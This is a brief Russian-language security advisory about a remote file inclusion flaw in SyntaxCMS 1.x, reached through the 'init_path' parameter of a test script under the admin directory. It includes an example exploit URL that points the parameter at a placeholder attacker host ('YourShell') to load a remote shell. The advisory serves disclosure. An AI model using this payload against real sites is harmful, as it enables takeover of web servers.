Программа: SyntaxCMS 1.x

Обнаруженная уязвимость в SyntaxCMS может быть использована для подключения произвольных файлов с локальных и внешних ресурсов. Уязвимость возникает из-за того, что данные, передаваемые через параметр "init_path" не правильно обрабатываются в admin/testing/tests/0004_init_urls.php. 

Для успешного эксплуатирования уязвимости требуется включение опций "register_globals" и "allow_fopen_url".

Пример:

http://www.poweredbysyntaxcmssite.com/admin/testing/ tests/0004_init_urls.php?init_path=http://YourShell?&



Оставить мнение